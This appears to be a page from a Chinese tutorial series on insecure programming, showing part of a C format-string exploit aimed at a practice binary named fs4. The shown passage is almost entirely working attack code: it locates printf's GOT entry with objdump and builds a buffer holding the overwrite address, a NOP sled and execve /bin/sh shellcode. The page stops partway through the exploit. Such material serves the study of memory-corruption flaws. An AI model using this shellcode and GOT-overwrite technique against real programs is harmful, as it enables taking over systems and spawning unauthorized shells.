WEB开发网
开发学院网络安全黑客技术 非安全编程演示之格式化字符串(2) 阅读

非安全编程演示之格式化字符串(2)

 2006-04-02 20:26:42 来源:WEB开发网   
核心提示: #define OBJDUMP "/usr/bin/objdump"#define VICTIM "/home/user/gera/fs4"#define GREP "/bin/grep"/* 24 bytes shellcode


#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs4"
#define GREP "/bin/grep"


/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


int main(void) {


char evil_buffer[49151 + 1], temp_buffer[64];
char *p;
int printf_address;
FILE *f;


sprintf(temp_buffer, "%s -R %s | %s printf", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &printf_address) != 1) {
pclose(f);
printf("Error: Cannot find printf() address in GOT!\n");
exit(1);
}


printf("printf() address in GOT is: 0x%x\n", printf_address);


/* Evil buffer */


p = evil_buffer;


/* Some junk here */
memset(p, 'B', 8);
p += 8;


*((void **)p) = (void *) (printf_address + 2);
p += 4;


/* Adding NOPs. 12 = 8(for junk) + 4(for address) */
memset(p, '\x90', (sizeof(evil_buffer) - strlen(shellcode) - 12 -
1));
p += (sizeof(evil_buffer) - strlen(shellcode) - 12 - 1);


/* Adding shellcode */
memcpy(p, shellcode, strlen(shellcode));
p += strlen(shellcode);
*p = '\0';

上一页  1 2 3 4 5 6 7 8  下一页

Tags:安全 编程 演示

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接